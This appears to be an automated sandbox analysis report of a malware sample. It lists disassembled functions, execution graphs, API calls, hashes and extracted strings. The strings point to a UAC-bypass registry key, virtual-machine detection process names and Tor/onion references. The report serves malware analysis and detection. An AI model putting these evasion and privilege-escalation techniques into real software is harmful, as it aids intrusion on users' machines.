                                                                                            • Instruction ID: cadf7bc74ba31bd94f62aa4e917b5ccd658968ea06855c9c4d8487d44a0cfa8d
                                                                                            • Opcode Fuzzy Hash: 0fa5f7b0a4ff4c446599bd7e9e9d62c037584218d663b1382faa8927819f3f32
                                                                                            • Instruction Fuzzy Hash: 31511A34900349CFCB15DFB9EA8069EBBB2FB49704F60456DC4116B354CB39AD96CBA1
                                                                                            Function 01790CD9 Relevance: .1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1374714127.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1790000_25C1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6709f78d96b6db6a2d5de5883154c696abc768657ded97f0b6c4f7ddf384747c
                                                                                            • Instruction ID: 8df5657fe870d6795ba5c15e0cfaf81aac11f623eba513bd8d3201951f8a70a7
                                                                                            • Opcode Fuzzy Hash: 6709f78d96b6db6a2d5de5883154c696abc768657ded97f0b6c4f7ddf384747c
                                                                                            • Instruction Fuzzy Hash: 5631F5317006168FCF05DBADE4809AEFBF9EF85214B144166E419DB252DB30ED4ACBD0

                                                                                            Execution Graph

                                                                                            Execution Coverage:4.4%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:50%
                                                                                            Total number of Nodes:12
                                                                                            Total number of Limit Nodes:1
                                                                                            execution_graph 839 2830026 840 2830035 839->840 843 28307c6 840->843 844 28307e1 843->844 845 28307ea CreateToolhelp32Snapshot 844->845 846 2830806 Module32First 844->846 845->844 845->846 847 2830815 846->847 848 283003e 846->848 850 2830485 847->850 851 28304b0 850->851 852 28304c1 VirtualAlloc 851->852 853 28304f9 851->853 852->853 853->853

                                                                                            Executed Functions

                                                                                            Function 028307C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 028307EE
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0283080E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2830000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: f6eb900e340429372f1f3f912505ee090bf49652f6d08fb7751133858f5e4ad8
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: D6F0623D2007147BD7213BB9AC8DB6F76E8EF49629F100528E646D10C0DB70E8458AA1
                                                                                            Function 02830485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 13 2830485-28304bf call 2830798 16 28304c1-28304f4 VirtualAlloc call 2830512 13->16 17 283050d 13->17 19 28304f9-283050b 16->19 17->17 19->17
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 028304D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2830000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: f17c0e41234af7b365e5209817f924ef93902d20da7713dd9daea1a936d944f2
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: 8A113C79A00208EFDB01DF98C985E99BBF5AF08351F158094F948AB361D371EA90DF90

                                                                                            Non-executed Functions

                                                                                            Function 028300A3 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2830000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                            • Instruction ID: 2276f0549dea911d17943def1054916e422843b388eee5b1f415deb8c1095030
                                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                            • Instruction Fuzzy Hash: 5A11827A340104AFD754DF59DCD0FA673EAEB89324B198065ED08CB312E775E842CBA0
                                                                                            Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                            • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                            • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                            • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                            • %, xrefs: 00433B64
                                                                                            • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                            • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000840000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C77000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CCF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CD3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CEF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CF6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                            • API String ID: 0-2845907608
                                                                                            • Opcode ID: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
                                                                                            • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                            • Opcode Fuzzy Hash: 5abccb9955bb7e61ea68e392401cb810dba1d0244b6c3c0f14204fc9a1a2f5da
                                                                                            • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                            Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                            • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                            • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                            • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000840000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C77000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CCF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CD3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CEF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1471270614.0000000000CF6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                            • API String ID: 0-3530339137
                                                                                            • Opcode ID: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                            • Opcode Fuzzy Hash: 8b027008e4681ae371e7009484516bb6ae8be36b8b546ccf354ab389333accda
                                                                                            • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A

                                                                                            Execution Graph

                                                                                            Execution Coverage:18.1%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:16.4%
                                                                                            Total number of Nodes:1337
                                                                                            Total number of Limit Nodes:23
                                                                                            execution_graph 3581 404f43 GetDlgItem GetDlgItem 3582 404f95 7 API calls 3581->3582 3590 4051ba 3581->3590 3583 40503c DeleteObject 3582->3583 3584 40502f SendMessageW 3582->3584 3585 405045 3583->3585 3584->3583 3586 40507c 3585->3586 3591 406594 21 API calls 3585->3591 3633 4044d6 3586->3633 3587 40529c 3589 405348 3587->3589 3594 4051ad 3587->3594 3600 4052f5 SendMessageW 3587->3600 3595 405352 SendMessageW 3589->3595 3596 40535a 3589->3596 3590->3587 3615 405229 3590->3615 3638 404e91 SendMessageW 3590->3638 3592 40505e SendMessageW SendMessageW 3591->3592 3592->3585 3593 405090 3599 4044d6 22 API calls 3593->3599 3655 40453d 3594->3655 3595->3596 3603 405373 3596->3603 3604 40536c ImageList_Destroy 3596->3604 3611 405383 3596->3611 3616 4050a1 3599->3616 3600->3594 3606 40530a SendMessageW 3600->3606 3601 40528e SendMessageW 3601->3587 3607 40537c GlobalFree 3603->3607 3603->3611 3604->3603 3605 4054fd 3605->3594 3612 40550f ShowWindow GetDlgItem ShowWindow 3605->3612 3609 40531d 3606->3609 3607->3611 3608 40517c GetWindowLongW SetWindowLongW 3610 405195 3608->3610 3620 40532e SendMessageW 3609->3620 3613 4051b2 3610->3613 3614 40519a ShowWindow 3610->3614 3611->3605 3628 4053be 3611->3628 3643 404f11 3611->3643 3612->3594 3637 40450b SendMessageW 3613->3637 3636 40450b SendMessageW 3614->3636 3615->3587 3615->3601 3616->3608 3619 4050f4 SendMessageW 3616->3619 3621 405177 3616->3621 3622 405132 SendMessageW 3616->3622 3623 405146 SendMessageW 3616->3623 3619->3616 3620->3589 3621->3608 3621->3610 3622->3616 3623->3616 3625 4054c8 3626 4054d3 InvalidateRect 3625->3626 3630 4054df 3625->3630 3626->3630 3627 4053ec SendMessageW 3629 405402 3627->3629 3628->3627 3628->3629 3629->3625 3631 405476 SendMessageW SendMessageW 3629->3631 3630->3605 3652 404e4c 3630->3652 3631->3629 3634 406594 21 API calls 3633->3634 3635 4044e1 SetDlgItemTextW 3634->3635 3635->3593 3636->3594 3637->3590 3639 404ef0 SendMessageW 3638->3639 3640 404eb4 GetMessagePos ScreenToClient SendMessageW 3638->3640 3641 404ee8 3639->3641 3640->3641 3642 404eed 3640->3642 3641->3615 3642->3639 3669 406557 lstrcpynW 3643->3669 3645 404f24 3670 40649e wsprintfW 3645->3670 3647 404f2e 3648 40140b 2 API calls 3647->3648 3649 404f37 3648->3649 3671 406557 lstrcpynW 3649->3671 3651 404f3e 3651->3628 3672 404d83 3652->3672 3654 404e61 3654->3605 3656 404555 GetWindowLongW 3655->3656 3666 404600 3655->3666 3657 40456a 3656->3657 3656->3666 3658 404597 GetSysColor 3657->3658 3659 40459a 3657->3659 3657->3666 3658->3659 3660 4045a0 SetTextColor 3659->3660 3661 4045aa SetBkMode 3659->3661 3660->3661 3662 4045c2 GetSysColor 3661->3662 3663 4045c8 3661->3663 3662->3663 3664 4045d9 3663->3664 3665 4045cf SetBkColor 3663->3665 3664->3666 3667 4045f3 CreateBrushIndirect 3664->3667 3668 4045ec DeleteObject 3664->3668 3665->3664 3667->3666 3668->3667 3669->3645 3670->3647 3671->3651 3673 404d9c 3672->3673 3674 406594 21 API calls 3673->3674 3675 404e00 3674->3675 3676 406594 21 API calls 3675->3676 3677 404e0b 3676->3677 3678 406594 21 API calls 3677->3678 3679 404e21 lstrlenW wsprintfW SetDlgItemTextW 3678->3679 3679->3654 3680 402643 3681 402672 3680->3681 3682 402657 3680->3682 3684 4026a2 3681->3684 3685 402677 3681->3685 3683 402d89 21 API calls 3682->3683 3694 40265e 3683->3694 3687 402dab 21 API calls 3684->3687 3686 402dab 21 API calls 3685->3686 3688 40267e 3686->3688 3689 4026a9 lstrlenW 3687->3689 3697 406579 WideCharToMultiByte 3688->3697 3689->3694 3691 402692 lstrlenA 3691->3694 3692 4026d6 3693 4026ec 3692->3693 3695 4060f9 WriteFile 3692->3695 3694->3692 3694->3693 3698 406128 SetFilePointer 3694->3698 3695->3693 3697->3691 3699 406144 3698->3699 3700 40615c 3698->3700 3701 4060ca ReadFile 3699->3701 3700->3692 3702 406150 3701->3702 3702->3700 3703 406165 SetFilePointer 3702->3703 3704 40618d SetFilePointer 3702->3704 3703->3704 3705 406170 3703->3705 3704->3700 3706 4060f9 WriteFile 3705->3706 3706->3700 3471 4015c6 3472 402dab 21 API calls 3471->3472 3473 4015cd 3472->3473 3474 405ed1 4 API calls 3473->3474 3489 4015d6 3474->3489 3475 401636 3477 401668 3475->3477 3478 40163b 3475->3478 3476 405e53 CharNextW 3476->3489 3480 401423 28 API calls 3477->3480 3490 401423 3478->3490 3486 401660 3480->3486 3482 405b05 2 API calls 3482->3489 3484 405b22 5 API calls 3484->3489 3485 40164f SetCurrentDirectoryW 3485->3486 3487 40161c GetFileAttributesW 3487->3489 3488 405aab 2 API calls 3488->3489 3489->3475 3489->3476 3489->3482 3489->3484 3489->3487 3489->3488 3491 4055dc 28 API calls 3490->3491 3492 401431 3491->3492 3493 406557 lstrcpynW 3492->3493 3493->3485 3707 404646 lstrlenW 3708 404665 3707->3708 3709 404667 WideCharToMultiByte 3707->3709 3708->3709 3710 4049c7 3711 4049f3 3710->3711 3712 404a04 3710->3712 3771 405b9b GetDlgItemTextW 3711->3771 3714 404a10 GetDlgItem 3712->3714 3715 404a6f 3712->3715 3718 404a24 3714->3718 3716 404b53 3715->3716 3724 406594 21 API calls 3715->3724 3769 404d02 3715->3769 3716->3769 3773 405b9b GetDlgItemTextW 3716->3773 3717 4049fe 3719 406805 5 API calls 3717->3719 3720 404a38 SetWindowTextW 3718->3720 3722 405ed1 4 API calls 3718->3722 3719->3712 3723 4044d6 22 API calls 3720->3723 3728 404a2e 3722->3728 3729 404a54 3723->3729 3730 404ae3 SHBrowseForFolderW 3724->3730 3725 404b83 3731 405f2e 18 API calls 3725->3731 3726 40453d 8 API calls 3727 404d16 3726->3727 3728->3720 3735 405e26 3 API calls 3728->3735 3732 4044d6 22 API calls 3729->3732 3730->3716 3733 404afb CoTaskMemFree 3730->3733 3734 404b89 3731->3734 3736 404a62 3732->3736 3737 405e26 3 API calls 3733->3737 3774 406557 lstrcpynW 3734->3774 3735->3720 3772 40450b SendMessageW 3736->3772 3744 404b08 3737->3744 3740 404a68 3743 40694b 5 API calls 3740->3743 3741 404b3f SetDlgItemTextW 3741->3716 3742 404ba0 3745 40694b 5 API calls 3742->3745 3743->3715 3744->3741 3746 406594 21 API calls 3744->3746 3752 404ba7 3745->3752 3747 404b27 lstrcmpiW 3746->3747 3747->3741 3750 404b38 lstrcatW 3747->3750 3748 404be8 3775 406557 lstrcpynW 3748->3775 3750->3741 3751 404bef 3753 405ed1 4 API calls 3751->3753 3752->3748 3756 405e72 2 API calls 3752->3756 3758 404c40 3752->3758 3754 404bf5 GetDiskFreeSpaceW 3753->3754 3757 404c19 MulDiv 3754->3757 3754->3758 3756->3752 3757->3758 3759 404cb1 3758->3759 3761 404e4c 24 API calls 3758->3761 3760 404cd4 3759->3760 3762 40140b 2 API calls 3759->3762 3776 4044f8 EnableWindow 3760->3776 3763 404c9e 3761->3763 3762->3760 3765 404cb3 SetDlgItemTextW 3763->3765 3766 404ca3 3763->3766 3765->3759 3768 404d83 24 API calls 3766->3768 3767 404cf0 3767->3769 3777 404920 3767->3777 3768->3759 3769->3726 3771->3717 3772->3740 3773->3725 3774->3742 3775->3751 3776->3767 3778 404933 SendMessageW 3777->3778 3779 40492e 3777->3779 3778->3769 3779->3778 3780 401c48 3781 402d89 21 API calls 3780->3781 3782 401c4f 3781->3782 3783 402d89 21 API calls 3782->3783 3784 401c5c 3783->3784 3785 401c71 3784->3785 3786 402dab 21 API calls 3784->3786 3787 402dab 21 API calls 3785->3787 3791 401c81 3785->3791 3786->3785 3787->3791 3788 401cd8 3790 402dab 21 API calls 3788->3790 3789 401c8c 3792 402d89 21 API calls 3789->3792 3793 401cdd 3790->3793 3791->3788 3791->3789 3794 401c91 3792->3794 3795 402dab 21 API calls 3793->3795 3796 402d89 21 API calls 3794->3796 3798 401ce6 FindWindowExW 3795->3798 3797 401c9d 3796->3797 3799 401cc8 SendMessageW 3797->3799 3800 401caa SendMessageTimeoutW 3797->3800 3801 401d08 3798->3801 3799->3801 3800->3801 3802 4028c9 3803 4028cf 3802->3803 3804 4028d7 FindClose 3803->3804 3805 402c2f 3803->3805 3804->3805 3545 403b4f 3546 403b67 3545->3546 3547 403b59 CloseHandle 3545->3547 3552 403b94 3546->3552 3547->3546 3550 405c63 71 API calls 3551 403b78 3550->3551 3553 403ba2 3552->3553 3554 403ba7 FreeLibrary GlobalFree 3553->3554 3555 403b6c 3553->3555 3554->3554 3554->3555 3555->3550 3809 405550 3810 405560 3809->3810 3811 405574 3809->3811 3813 405566 3810->3813 3814 4055bd 3810->3814 3812 40557c IsWindowVisible 3811->3812 3820 405593 3811->3820 3812->3814 3816 405589 3812->3816 3815 404522 SendMessageW 3813->3815 3817 4055c2 CallWindowProcW 3814->3817 3818 405570 3815->3818 3819 404e91 5 API calls 3816->3819 3817->3818 3819->3820 3820->3817 3821 404f11 4 API calls 3820->3821 3821->3814 3822 4016d1 3823 402dab 21 API calls 3822->3823 3824 4016d7 GetFullPathNameW 3823->3824 3825 4016f1 3824->3825 3826 401713 3824->3826 3825->3826 3829 4068b4 2 API calls 3825->3829 3827 401728 GetShortPathNameW 3826->3827 3828 402c2f 3826->3828 3827->3828 3830 401703 3829->3830 3830->3826 3832 406557 lstrcpynW 3830->3832 3832->3826 3833 401e53 GetDC 3834 402d89 21 API calls 3833->3834 3835 401e65 GetDeviceCaps MulDiv ReleaseDC 3834->3835 3836 402d89 21 API calls 3835->3836 3837 401e96 3836->3837 3838 406594 21 API calls 3837->3838 3839 401ed3 CreateFontIndirectW 3838->3839 3840 40263d 3839->3840 3841 402955 3842 402dab 21 API calls 3841->3842 3843 402961 3842->3843 3844 402977 3843->3844 3845 402dab 21 API calls 3843->3845 3846 406022 2 API calls 3844->3846 3845->3844 3847 40297d 3846->3847 3869 406047 GetFileAttributesW CreateFileW 3847->3869 3849 40298a 3850 402a40 3849->3850 3853 4029a5 GlobalAlloc 3849->3853 3854 402a28 3849->3854 3851 402a47 DeleteFileW 3850->3851 3852 402a5a 3850->3852 3851->3852 3853->3854 3855 4029be 3853->3855 3856 4032b9 35 API calls 3854->3856 3870 4034ea SetFilePointer 3855->3870 3858 402a35 CloseHandle 3856->3858 3858->3850 3859 4029c4 3860 4034d4 ReadFile 3859->3860 3861 4029cd GlobalAlloc 3860->3861 3862 402a11 3861->3862 3863 4029dd 3861->3863 3865 4060f9 WriteFile 3862->3865 3864 4032b9 35 API calls 3863->3864 3867 4029ea 3864->3867 3866 402a1d GlobalFree 3865->3866 3866->3854 3868 402a08 GlobalFree 3867->3868 3868->3862 3869->3849 3870->3859 3871 403fd7 3872 404150 3871->3872 3873 403fef 3871->3873 3875 404161 GetDlgItem GetDlgItem 3872->3875 3892 4041a1 3872->3892 3873->3872 3874 403ffb 3873->3874 3876 404006 SetWindowPos 3874->3876 3877 404019 3874->3877 3878 4044d6 22 API calls 3875->3878 3876->3877 3881 404022 ShowWindow 3877->3881 3882 404064 3877->3882 3883 40418b SetClassLongW 3878->3883 3879 4041fb 3880 404522 SendMessageW 3879->3880 3885 40414b 3879->3885 3910 40420d 3880->3910 3886 404042 GetWindowLongW 3881->3886 3887 40410e 3881->3887 3888 404083 3882->3888 3889 40406c DestroyWindow 3882->3889 3890 40140b 2 API calls 3883->3890 3884 401389 2 API calls 3895 4041d3 3884->3895 3886->3887 3897 40405b ShowWindow 3886->3897 3896 40453d 8 API calls 3887->3896 3893 404088 SetWindowLongW 3888->3893 3894 404099 3888->3894 3891 40445f 3889->3891 3890->3892 3891->3885 3904 404490 ShowWindow 3891->3904 3892->3879 3892->3884 3893->3885 3894->3887 3898 4040a5 GetDlgItem 3894->3898 3895->3879 3899 4041d7 SendMessageW 3895->3899 3896->3885 3897->3882 3902 4040d3 3898->3902 3903 4040b6 SendMessageW IsWindowEnabled 3898->3903 3899->3885 3900 40140b 2 API calls 3900->3910 3901 404461 DestroyWindow EndDialog 3901->3891 3906 4040e0 3902->3906 3908 404127 SendMessageW 3902->3908 3909 4040f3 3902->3909 3916 4040d8 3902->3916 